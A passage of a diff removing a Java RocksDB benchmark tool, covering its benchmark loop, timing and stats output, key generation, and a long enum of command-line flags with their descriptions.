-        (Integer)flags_.get(Flag.universal_compression_size_percent));
-    // TODO(yhchiang): add RocksDB.openForReadOnly() to enable Flag.readonly
-    // TODO(yhchiang): enable Flag.merge_operator by switch
-    options.setAccessHintOnCompactionStart(
-        (String)flags_.get(Flag.compaction_fadvice));
-    // available values of fadvice are "NONE", "NORMAL", "SEQUENTIAL", "WILLNEED" for fadvice
-    */
-  }
-
-  private void run() throws RocksDBException {
-    if (!useExisting_) {
-      destroyDb();
-    }
-    Options options = new Options();
-    prepareOptions(options);
-    open(options);
-
-    printHeader(options);
-
-    for (String benchmark : benchmarks_) {
-      List<Callable<Stats>> tasks = new ArrayList<Callable<Stats>>();
-      List<Callable<Stats>> bgTasks = new ArrayList<Callable<Stats>>();
-      WriteOptions writeOpt = new WriteOptions();
-      prepareWriteOptions(writeOpt);
-      ReadOptions readOpt = new ReadOptions();
-      prepareReadOptions(readOpt);
-      int currentTaskId = 0;
-      boolean known = true;
-
-      switch (benchmark) {
-        case "fillseq":
-          tasks.add(new WriteSequentialTask(
-              currentTaskId++, randSeed_, num_, num_, writeOpt, 1));
-          break;
-        case "fillbatch":
-          tasks.add(new WriteRandomTask(
-              currentTaskId++, randSeed_, num_ / 1000, num_, writeOpt, 1000));
-          break;
-        case "fillrandom":
-          tasks.add(new WriteRandomTask(
-              currentTaskId++, randSeed_, num_, num_, writeOpt, 1));
-          break;
-        case "filluniquerandom":
-          tasks.add(new WriteUniqueRandomTask(
-              currentTaskId++, randSeed_, num_, num_, writeOpt, 1));
-          break;
-        case "fillsync":
-          writeOpt.setSync(true);
-          tasks.add(new WriteRandomTask(
-              currentTaskId++, randSeed_, num_ / 1000, num_ / 1000,
-              writeOpt, 1));
-          break;
-        case "readseq":
-          for (int t = 0; t < threadNum_; ++t) {
-            tasks.add(new ReadSequentialTask(
-                currentTaskId++, randSeed_, reads_ / threadNum_, num_));
-          }
-          break;
-        case "readrandom":
-          for (int t = 0; t < threadNum_; ++t) {
-            tasks.add(new ReadRandomTask(
-                currentTaskId++, randSeed_, reads_ / threadNum_, num_));
-          }
-          break;
-        case "readwhilewriting":
-          WriteTask writeTask = new WriteRandomTask(
-              -1, randSeed_, Long.MAX_VALUE, num_, writeOpt, 1, writesPerSeconds_);
-          writeTask.stats_.setExcludeFromMerge();
-          bgTasks.add(writeTask);
-          for (int t = 0; t < threadNum_; ++t) {
-            tasks.add(new ReadRandomTask(
-                currentTaskId++, randSeed_, reads_ / threadNum_, num_));
-          }
-          break;
-        case "readhot":
-          for (int t = 0; t < threadNum_; ++t) {
-            tasks.add(new ReadRandomTask(
-                currentTaskId++, randSeed_, reads_ / threadNum_, num_ / 100));
-          }
-          break;
-        case "delete":
-          destroyDb();
-          open(options);
-          break;
-        default:
-          known = false;
-          System.err.println("Unknown benchmark: " + benchmark);
-          break;
-      }
-      if (known) {
-        ExecutorService executor = Executors.newCachedThreadPool();
-        ExecutorService bgExecutor = Executors.newCachedThreadPool();
-        try {
-          // measure only the main executor time
-          List<Future<Stats>> bgResults = new ArrayList<Future<Stats>>();
-          for (Callable bgTask : bgTasks) {
-            bgResults.add(bgExecutor.submit(bgTask));
-          }
-          start();
-          List<Future<Stats>> results = executor.invokeAll(tasks);
-          executor.shutdown();
-          boolean finished = executor.awaitTermination(10, TimeUnit.SECONDS);
-          if (!finished) {
-            System.out.format(
-                "Benchmark %s was not finished before timeout.",
-                benchmark);
-            executor.shutdownNow();
-          }
-          setFinished(true);
-          bgExecutor.shutdown();
-          finished = bgExecutor.awaitTermination(10, TimeUnit.SECONDS);
-          if (!finished) {
-            System.out.format(
-                "Benchmark %s was not finished before timeout.",
-                benchmark);
-            bgExecutor.shutdownNow();
-          }
-
-          stop(benchmark, results, currentTaskId);
-        } catch (InterruptedException e) {
-          System.err.println(e);
-        }
-      }
-      writeOpt.dispose();
-      readOpt.dispose();
-    }
-    options.dispose();
-    db_.close();
-  }
-
-  private void printHeader(Options options) {
-    int kKeySize = 16;
-    System.out.printf("Keys:     %d bytes each\n", kKeySize);
-    System.out.printf("Values:   %d bytes each (%d bytes after compression)\n",
-        valueSize_,
-        (int) (valueSize_ * compressionRatio_ + 0.5));
-    System.out.printf("Entries:  %d\n", num_);
-    System.out.printf("RawSize:  %.1f MB (estimated)\n",
-        ((double)(kKeySize + valueSize_) * num_) / SizeUnit.MB);
-    System.out.printf("FileSize:   %.1f MB (estimated)\n",
-        (((kKeySize + valueSize_ * compressionRatio_) * num_) / SizeUnit.MB));
-    System.out.format("Memtable Factory: %s%n", options.memTableFactoryName());
-    System.out.format("Prefix:   %d bytes%n", prefixSize_);
-    System.out.format("Compression: %s%n", compressionType_);
-    printWarnings();
-    System.out.printf("------------------------------------------------\n");
-  }
-
-  void printWarnings() {
-    boolean assertsEnabled = false;
-    assert assertsEnabled = true; // Intentional side effect!!!
-    if (assertsEnabled) {
-      System.out.printf(
-          "WARNING: Assertions are enabled; benchmarks unnecessarily slow\n");
-    }
-  }
-
-  private void open(Options options) throws RocksDBException {
-    System.out.println("Using database directory: " + databaseDir_);
-    db_ = RocksDB.open(options, databaseDir_);
-  }
-
-  private void start() {
-    setFinished(false);
-    startTime_ = System.nanoTime();
-  }
-
-  private void stop(
-      String benchmark, List<Future<Stats>> results, int concurrentThreads) {
-    long endTime = System.nanoTime();
-    double elapsedSeconds =
-        1.0d * (endTime - startTime_) / TimeUnit.SECONDS.toNanos(1);
-
-    Stats stats = new Stats(-1);
-    int taskFinishedCount = 0;
-    for (Future<Stats> result : results) {
-      if (result.isDone()) {
-        try {
-          Stats taskStats = result.get(3, TimeUnit.SECONDS);
-          if (!result.isCancelled()) {
-            taskFinishedCount++;
-          }
-          stats.merge(taskStats);
-        } catch (Exception e) {
-          // then it's not successful, the output will indicate this
-        }
-      }
-    }
-    String extra = "";
-    if (benchmark.indexOf("read") >= 0) {
-      extra = String.format(" %d / %d found; ", stats.found_, stats.done_);
-    } else {
-      extra = String.format(" %d ops done; ", stats.done_);
-    }
-
-    System.out.printf(
-        "%-16s : %11.5f micros/op; %6.1f MB/s;%s %d / %d task(s) finished.\n",
-        benchmark, elapsedSeconds / stats.done_ * 1e6,
-        (stats.bytes_ / 1048576.0) / elapsedSeconds, extra,
-        taskFinishedCount, concurrentThreads);
-  }
-
-  public void generateKeyFromLong(byte[] slice, long n) {
-    assert(n >= 0);
-    int startPos = 0;
-
-    if (keysPerPrefix_ > 0) {
-      long numPrefix = (num_ + keysPerPrefix_ - 1) / keysPerPrefix_;
-      long prefix = n % numPrefix;
-      int bytesToFill = Math.min(prefixSize_, 8);
-      for (int i = 0; i < bytesToFill; ++i) {
-        slice[i] = (byte) (prefix % 256);
-        prefix /= 256;
-      }
-      for (int i = 8; i < bytesToFill; ++i) {
-        slice[i] = '0';
-      }
-      startPos = bytesToFill;
-    }
-
-    for (int i = slice.length - 1; i >= startPos; --i) {
-      slice[i] = (byte) ('0' + (n % 10));
-      n /= 10;
-    }
-  }
-
-  private void destroyDb() {
-    if (db_ != null) {
-      db_.close();
-    }
-    // TODO(yhchiang): develop our own FileUtil
-    // FileUtil.deleteDir(databaseDir_);
-  }
-
-  private void printStats() {
-  }
-
-  static void printHelp() {
-    System.out.println("usage:");
-    for (Flag flag : Flag.values()) {
-      System.out.format("  --%s%n\t%s%n",
-          flag.name(),
-          flag.desc());
-      if (flag.getDefaultValue() != null) {
-        System.out.format("\tDEFAULT: %s%n",
-            flag.getDefaultValue().toString());
-      }
-    }
-  }
-
-  public static void main(String[] args) throws Exception {
-    Map<Flag, Object> flags = new EnumMap<Flag, Object>(Flag.class);
-    for (Flag flag : Flag.values()) {
-      if (flag.getDefaultValue() != null) {
-        flags.put(flag, flag.getDefaultValue());
-      }
-    }
-    for (String arg : args) {
-      boolean valid = false;
-      if (arg.equals("--help") || arg.equals("-h")) {
-        printHelp();
-        System.exit(0);
-      }
-      if (arg.startsWith("--")) {
-        try {
-          String[] parts = arg.substring(2).split("=");
-          if (parts.length >= 1) {
-            Flag key = Flag.valueOf(parts[0]);
-            if (key != null) {
-              Object value = null;
-              if (parts.length >= 2) {
-                value = key.parseValue(parts[1]);
-              }
-              flags.put(key, value);
-              valid = true;
-            }
-          }
-        }
-        catch (Exception e) {
-        }
-      }
-      if (!valid) {
-        System.err.println("Invalid argument " + arg);
-        System.exit(1);
-      }
-    }
-    new DbBenchmark(flags).run();
-  }
-
-  private enum Flag {
-    benchmarks(
-        Arrays.asList(
-            "fillseq",
-            "readrandom",
-            "fillrandom"),
-        "Comma-separated list of operations to run in the specified order\n" +
-        "\tActual benchmarks:\n" +
-        "\t\tfillseq          -- write N values in sequential key order in async mode.\n" +
-        "\t\tfillrandom       -- write N values in random key order in async mode.\n" +
-        "\t\tfillbatch        -- write N/1000 batch where each batch has 1000 values\n" +
-        "\t\t                   in random key order in sync mode.\n" +
-        "\t\tfillsync         -- write N/100 values in random key order in sync mode.\n" +
-        "\t\tfill100K         -- write N/1000 100K values in random order in async mode.\n" +
-        "\t\treadseq          -- read N times sequentially.\n" +
-        "\t\treadrandom       -- read N times in random order.\n" +
-        "\t\treadhot          -- read N times in random order from 1% section of DB.\n" +
-        "\t\treadwhilewriting -- measure the read performance of multiple readers\n" +
-        "\t\t                   with a bg single writer.  The write rate of the bg\n" +
-        "\t\t                   is capped by --writes_per_second.\n" +
-        "\tMeta Operations:\n" +
-        "\t\tdelete            -- delete DB") {
-      @Override public Object parseValue(String value) {
-        return new ArrayList<String>(Arrays.asList(value.split(",")));
-      }
-    },
-    compression_ratio(0.5d,
-        "Arrange to generate values that shrink to this fraction of\n" +
-        "\ttheir original size after compression.") {
-      @Override public Object parseValue(String value) {
-        return Double.parseDouble(value);
-      }
-    },
-    use_existing_db(false,
-        "If true, do not destroy the existing database.  If you set this\n" +
-        "\tflag and also specify a benchmark that wants a fresh database,\n" +
-        "\tthat benchmark will fail.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    num(1000000,
-        "Number of key/values to place in database.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    threads(1,
-        "Number of concurrent threads to run.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    reads(null,
-        "Number of read operations to do.  If negative, do --nums reads.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    key_size(16,
-        "The size of each key in bytes.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    value_size(100,
-        "The size of each value in bytes.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    write_buffer_size(4L * SizeUnit.MB,
-        "Number of bytes to buffer in memtable before compacting\n" +
-        "\t(initialized to default value by 'main'.)") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    max_write_buffer_number(2,
-             "The number of in-memory memtables. Each memtable is of size\n" +
-             "\twrite_buffer_size.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    prefix_size(0, "Controls the prefix size for HashSkipList, HashLinkedList,\n" +
-                   "\tand plain table.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    keys_per_prefix(0, "Controls the average number of keys generated\n" +
-             "\tper prefix, 0 means no special handling of the prefix,\n" +
-             "\ti.e. use the prefix comes with the generated random number.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    memtablerep("skip_list",
-        "The memtable format.  Available options are\n" +
-        "\tskip_list,\n" +
-        "\tvector,\n" +
-        "\thash_linkedlist,\n" +
-        "\thash_skiplist (prefix_hash.)") {
-      @Override public Object parseValue(String value) {
-        return value;
-      }
-    },
-    hash_bucket_count(SizeUnit.MB,
-        "The number of hash buckets used in the hash-bucket-based\n" +
-        "\tmemtables.  Memtables that currently support this argument are\n" +
-        "\thash_linkedlist and hash_skiplist.") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    writes_per_second(10000,
-        "The write-rate of the background writer used in the\n" +
-        "\t`readwhilewriting` benchmark.  Non-positive number indicates\n" +
-        "\tusing an unbounded write-rate in `readwhilewriting` benchmark.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    use_plain_table(false,
-        "Use plain-table sst format.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    cache_size(-1L,
-        "Number of bytes to use as a cache of uncompressed data.\n" +
-        "\tNegative means use default settings.") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    seed(0L,
-        "Seed base for random number generators.") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    num_levels(7,
-        "The total number of levels.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    numdistinct(1000L,
-        "Number of distinct keys to use. Used in RandomWithVerify to\n" +
-        "\tread/write on fewer keys so that gets are more likely to find the\n" +
-        "\tkey and puts are more likely to update the same key.") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    merge_keys(-1L,
-        "Number of distinct keys to use for MergeRandom and\n" +
-        "\tReadRandomMergeRandom.\n" +
-        "\tIf negative, there will be FLAGS_num keys.") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    bloom_locality(0,"Control bloom filter probes locality.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    duration(0,"Time in seconds for the random-ops tests to run.\n" +
-        "\tWhen 0 then num & reads determine the test duration.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    num_multi_db(0,
-        "Number of DBs used in the benchmark. 0 means single DB.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    histogram(false,"Print histogram of operation timings.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    min_write_buffer_number_to_merge(
-        defaultOptions_.minWriteBufferNumberToMerge(),
-        "The minimum number of write buffers that will be merged together\n" +
-        "\tbefore writing to storage. This is cheap because it is an\n" +
-        "\tin-memory merge. If this feature is not enabled, then all these\n" +
-        "\twrite buffers are flushed to L0 as separate files and this\n" +
-        "\tincreases read amplification because a get request has to check\n" +
-        "\tin all of these files. Also, an in-memory merge may result in\n" +
-        "\twriting less data to storage if there are duplicate records\n" +
-        "\tin each of these individual write buffers.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    max_background_compactions(
-        defaultOptions_.maxBackgroundCompactions(),
-        "The maximum number of concurrent background compactions\n" +
-        "\tthat can occur in parallel.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    max_background_flushes(
-        defaultOptions_.maxBackgroundFlushes(),
-        "The maximum number of concurrent background flushes\n" +
-        "\tthat can occur in parallel.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    /* TODO(yhchiang): enable the following
-    compaction_style((int32_t) defaultOptions_.compactionStyle(),
-        "style of compaction: level-based vs universal.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },*/
-    universal_size_ratio(0,
-        "Percentage flexibility while comparing file size\n" +
-        "\t(for universal compaction only).") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    universal_min_merge_width(0,"The minimum number of files in a\n" +
-        "\tsingle compaction run (for universal compaction only).") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    universal_max_merge_width(0,"The max number of files to compact\n" +
-        "\tin universal style compaction.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    universal_max_size_amplification_percent(0,
-        "The max size amplification for universal style compaction.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    universal_compression_size_percent(-1,
-        "The percentage of the database to compress for universal\n" +
-        "\tcompaction. -1 means compress everything.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    block_size(defaultBlockBasedTableOptions_.blockSize(),
-        "Number of bytes in a block.") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    compressed_cache_size(-1L,
-        "Number of bytes to use as a cache of compressed data.") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    open_files(defaultOptions_.maxOpenFiles(),
-        "Maximum number of files to keep open at the same time\n" +
-        "\t(use default if == 0)") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    bloom_bits(-1,"Bloom filter bits per key. Negative means\n" +
-        "\tuse default settings.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    memtable_bloom_size_ratio(0.0d, "Ratio of memtable used by the bloom filter.\n"
-            + "\t0 means no bloom filter.") {
-      @Override public Object parseValue(String value) {
-        return Double.parseDouble(value);
-      }
-    },
-    cache_numshardbits(-1,"Number of shards for the block cache\n" +
-        "\tis 2 ** cache_numshardbits. Negative means use default settings.\n" +
-        "\tThis is applied only if FLAGS_cache_size is non-negative.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    verify_checksum(false,"Verify checksum for every block read\n" +
-        "\tfrom storage.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    statistics(false,"Database statistics.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    writes(-1L, "Number of write operations to do. If negative, do\n" +
-        "\t--num reads.") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    sync(false,"Sync all writes to disk.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    use_fsync(false,"If true, issue fsync instead of fdatasync.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    disable_wal(false,"If true, do not write WAL for write.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    wal_dir("", "If not empty, use the given dir for WAL.") {
-      @Override public Object parseValue(String value) {
-        return value;
-      }
-    },
-    target_file_size_base(2 * 1048576,"Target file size at level-1") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    target_file_size_multiplier(1,
-        "A multiplier to compute target level-N file size (N >= 2)") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    max_bytes_for_level_base(10 * 1048576,
-      "Max bytes for level-1") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    max_bytes_for_level_multiplier(10.0d,
-        "A multiplier to compute max bytes for level-N (N >= 2)") {
-      @Override public Object parseValue(String value) {
-        return Double.parseDouble(value);
-      }
-    },
-    level0_stop_writes_trigger(12,"Number of files in level-0\n" +
-        "\tthat will trigger put stop.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    level0_slowdown_writes_trigger(8,"Number of files in level-0\n" +
-        "\tthat will slow down writes.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    level0_file_num_compaction_trigger(4,"Number of files in level-0\n" +
-        "\twhen compactions start.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    readwritepercent(90,"Ratio of reads to reads/writes (expressed\n" +
-        "\tas percentage) for the ReadRandomWriteRandom workload. The\n" +
-        "\tdefault value 90 means 90% operations out of all reads and writes\n" +
-        "\toperations are reads. In other words, 9 gets for every 1 put.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    mergereadpercent(70,"Ratio of merges to merges&reads (expressed\n" +
-        "\tas percentage) for the ReadRandomMergeRandom workload. The\n" +
-        "\tdefault value 70 means 70% out of all read and merge operations\n" +
-        "\tare merges. In other words, 7 merges for every 3 gets.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    deletepercent(2,"Percentage of deletes out of reads/writes/\n" +
-        "\tdeletes (used in RandomWithVerify only). RandomWithVerify\n" +
-        "\tcalculates writepercent as (100 - FLAGS_readwritepercent -\n" +
-        "\tdeletepercent), so deletepercent must be smaller than (100 -\n" +
-        "\tFLAGS_readwritepercent)") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    delete_obsolete_files_period_micros(0,"Option to delete\n" +
-        "\tobsolete files periodically. 0 means that obsolete files are\n" +
-        "\tdeleted after every compaction run.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    compression_type("snappy",
-        "Algorithm used to compress the database.") {
-      @Override public Object parseValue(String value) {
-        return value;
-      }
-    },
-    compression_level(-1,
-        "Compression level. For zlib this should be -1 for the\n" +
-        "\tdefault level, or between 0 and 9.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    min_level_to_compress(-1,"If non-negative, compression starts\n" +
-        "\tfrom this level. Levels with number < min_level_to_compress are\n" +
-        "\tnot compressed. Otherwise, apply compression_type to\n" +
-        "\tall levels.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    table_cache_numshardbits(4,"") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    stats_interval(0L, "Stats are reported every N operations when\n" +
-        "\tthis is greater than zero. When 0 the interval grows over time.") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    stats_per_interval(0,"Reports additional stats per interval when\n" +
-        "\tthis is greater than 0.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    perf_level(0,"Level of perf collection.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    soft_rate_limit(0.0d,"") {
-      @Override public Object parseValue(String value) {
-        return Double.parseDouble(value);
-      }
-    },
-    hard_rate_limit(0.0d,"When not equal to 0 this make threads\n" +
-        "\tsleep at each stats reporting interval until the compaction\n" +
-        "\tscore for all levels is less than or equal to this value.") {
-      @Override public Object parseValue(String value) {
-        return Double.parseDouble(value);
-      }
-    },
-    rate_limit_delay_max_milliseconds(1000,
-        "When hard_rate_limit is set then this is the max time a put will\n" +
-        "\tbe stalled.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    max_compaction_bytes(0L, "Limit number of bytes in one compaction to be lower than this\n" +
-            "\threshold. But it's not guaranteed.") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    readonly(false,"Run read only benchmarks.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    disable_auto_compactions(false,"Do not auto trigger compactions.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    wal_ttl_seconds(0L,"Set the TTL for the WAL Files in seconds.") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    wal_size_limit_MB(0L,"Set the size limit for the WAL Files\n" +
-        "\tin MB.") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    /* TODO(yhchiang): enable the following
-    direct_reads(rocksdb::EnvOptions().use_direct_reads,
-        "Allow direct I/O reads.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-      },
-    direct_writes(rocksdb::EnvOptions().use_direct_reads,
-      "Allow direct I/O reads.") {
-      @Override public Object parseValue(String value) {
-      return parseBoolean(value);
-      }
-      },
-    */
-    mmap_read(false,
-        "Allow reads to occur via mmap-ing files.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    mmap_write(false,
-        "Allow writes to occur via mmap-ing files.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    advise_random_on_open(defaultOptions_.adviseRandomOnOpen(),
-        "Advise random access on table file open.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    compaction_fadvice("NORMAL",
-      "Access pattern advice when a file is compacted.") {
-      @Override public Object parseValue(String value) {
-        return value;
-      }
-    },
-    use_tailing_iterator(false,
-        "Use tailing iterator to access a series of keys instead of get.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    use_adaptive_mutex(defaultOptions_.useAdaptiveMutex(),
-        "Use adaptive mutex.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    bytes_per_sync(defaultOptions_.bytesPerSync(),
-        "Allows OS to incrementally sync files to disk while they are\n" +
-        "\tbeing written, in the background. Issue one request for every\n" +
-        "\tbytes_per_sync written. 0 turns it off.") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    filter_deletes(false," On true, deletes use bloom-filter and drop\n" +
-        "\tthe delete if key not present.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    max_successive_merges(0,"Maximum number of successive merge\n" +
-        "\toperations on a key in the memtable.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    db(getTempDir("rocksdb-jni"),
-       "Use the db with the following name.") {
-      @Override public Object parseValue(String value) {
-        return value;
-      }
-    },
-    use_mem_env(false, "Use RocksMemEnv instead of default filesystem based\n" +
-        "environment.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    java_comparator(null, "Class name of a Java Comparator to use instead\n" +
-        "\tof the default C++ ByteWiseComparatorImpl. Must be available on\n" +
-        "\tthe classpath") {
-      @Override
-      protected Object parseValue(final String value) {
-        try {
-          final ComparatorOptions copt = new ComparatorOptions();
-          final Class<AbstractComparator> clsComparator =
-              (Class<AbstractComparator>)Class.forName(value);
-          final Constructor cstr =
-              clsComparator.getConstructor(ComparatorOptions.class);
-          return cstr.newInstance(copt);
-        } catch(final ClassNotFoundException cnfe) {
-          throw new IllegalArgumentException("Java Comparator '" + value + "'" +
-              " not found on the classpath", cnfe);
-        } catch(final NoSuchMethodException nsme) {
-          throw new IllegalArgumentException("Java Comparator '" + value + "'" +
-              " does not have a public ComparatorOptions constructor", nsme);
-        } catch(final IllegalAccessException | InstantiationException
-            | InvocationTargetException ie) {
-          throw new IllegalArgumentException("Unable to construct Java" +
-              " Comparator '" + value + "'", ie);
-        }
-      }
-    };
-
-    private Flag(Object defaultValue, String desc) {
-      defaultValue_ = defaultValue;
-      desc_ = desc;
-    }
-
-    public Object getDefaultValue() {
-      return defaultValue_;
-    }
-
-    public String desc() {
-      return desc_;
-    }
-
-    public boolean parseBoolean(String value) {
-      if (value.equals("1")) {
-        return true;
-      } else if (value.equals("0")) {
-        return false;
-      }
-      return Boolean.parseBoolean(value);
-    }
-
-    protected abstract Object parseValue(String value);
-
-    private final Object defaultValue_;
-    private final String desc_;
-  }
-
-  private final static String DEFAULT_TEMP_DIR = "/tmp";
-
-  private static String getTempDir(final String dirName) {
-    try {
-      return Files.createTempDirectory(dirName).toAbsolutePath().toString();
-    } catch(final IOException ioe) {
-      System.err.println("Unable to create temp directory, defaulting to: " +
-          DEFAULT_TEMP_DIR);
-      return DEFAULT_TEMP_DIR + File.pathSeparator + dirName;
-    }
-  }
-
-  private static class RandomGenerator {
-    private final byte[] data_;
-    private int dataLength_;
-    private int position_;
-    private double compressionRatio_;
-    Random rand_;
-
-    private RandomGenerator(long seed, double compressionRatio) {
-      // We use a limited amount of data over and over again and ensure
-      // that it is larger than the compression window (32KB), and also
-      byte[] value = new byte[100];
-      // large enough to serve all typical value sizes we want to write.
-      rand_ = new Random(seed);
-      dataLength_ = value.length * 10000;
-      data_ = new byte[dataLength_];
-      compressionRatio_ = compressionRatio;
-      int pos = 0;
-      while (pos < dataLength_) {
-        compressibleBytes(value);
-        System.arraycopy(value, 0, data_, pos,
-                         Math.min(value.length, dataLength_ - pos));
-        pos += value.length;
-      }
-    }
-
-    private void compressibleBytes(byte[] value) {
-      int baseLength = value.length;
-      if (compressionRatio_ < 1.0d) {
-        baseLength = (int) (compressionRatio_ * value.length + 0.5);
-      }
-      if (baseLength <= 0) {
-        baseLength = 1;
-      }
-      int pos;
-      for (pos = 0; pos < baseLength; ++pos) {
-        value[pos] = (byte) (' ' + rand_.nextInt(95));  // ' ' .. '~'
-      }
-      while (pos < value.length) {
-        System.arraycopy(value, 0, value, pos,
-                         Math.min(baseLength, value.length - pos));
-        pos += baseLength;
-      }
-    }
-
-    private void generate(byte[] value) {
-      if (position_ + value.length > data_.length) {
-        position_ = 0;
-        assert(value.length <= data_.length);
-      }
-      position_ += value.length;
-      System.arraycopy(data_, position_ - value.length,
-                       value, 0, value.length);
-    }
-  }
-
-  boolean isFinished() {
-    synchronized(finishLock_) {
-      return isFinished_;
-    }
-  }
-
-  void setFinished(boolean flag) {
-    synchronized(finishLock_) {
-      isFinished_ = flag;
-    }
-  }
-
-  RocksDB db_;
-  final List<String> benchmarks_;
-  final int num_;
-  final int reads_;
-  final int keySize_;
-  final int valueSize_;
-  final int threadNum_;
-  final int writesPerSeconds_;
-  final long randSeed_;
-  final boolean useExisting_;
-  final String databaseDir_;
-  double compressionRatio_;
-  RandomGenerator gen_;
-  long startTime_;
-
-  // env
-  boolean useMemenv_;
-
-  // memtable related
-  final int maxWriteBufferNumber_;
-  final int prefixSize_;
-  final int keysPerPrefix_;
-  final String memtable_;
-  final long hashBucketCount_;
-
-  // sst format related
-  boolean usePlainTable_;
-
-  Object finishLock_;
-  boolean isFinished_;
